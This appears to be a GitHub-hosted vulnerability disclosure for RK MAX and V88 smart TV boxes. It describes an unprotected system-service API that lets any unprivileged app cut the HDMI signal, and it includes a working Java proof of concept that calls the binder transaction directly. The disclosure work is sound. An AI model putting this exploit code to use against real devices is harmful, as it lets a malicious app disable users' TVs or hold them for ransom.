Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
TVBoxBugs/RK_MAX_V88_SmartTV_Vulnerability
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
35 lines (16 sloc)
1.35 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Vulnerability in RK MAX and V88 SmartTV box] | |
| I would like to report a security vulnerability in RK MAX ( build.id : MXC89L)and V88 (build.id:NHG47K) Smart TVs Boxes. | |
| The vulnerability allows to drop HDMI signals without any privilege requirement, thus creating an opportunity for a non-privilege malicious app to disable the basic functionalities that the TV box is offering or can even be used for ransomeware purpose - e.g., each time a target streaming app is launched, the malicious app can drop the signal. | |
| This vulnerability is due to the following: | |
| The devices introduce a (non-protected) custom API in the DisplayDeviceManagement system service “switchNextDisplayInterface” which takes as argument 1 integer. once invoked with parameter = 0, the HDMI signal will be dropped out. | |
| We can exploit this API as follows: | |
| Class ServiceManager = Class.forName("android.os.ServiceManager"); | |
| Method getService = ServiceManager.getMethod("getService", String.class); | |
| mRemote = (IBinder) getService.invoke(null,"display_device_management"); | |
| Parcel localParcel1 = Parcel.obtain(); | |
| Parcel localParcel2 = Parcel.obtain(); | |
| localParcel1.writeInterfaceToken("android.os.IDisplayDeviceManagementService"); | |
| localParcel1.writeInt(0); | |
| mRemote.transact(7, localParcel1, localParcel2, 0); // 7 corresponds to the vulnerable API | |
| localParcel2.recycle(); | |
| localParcel1.recycle(); |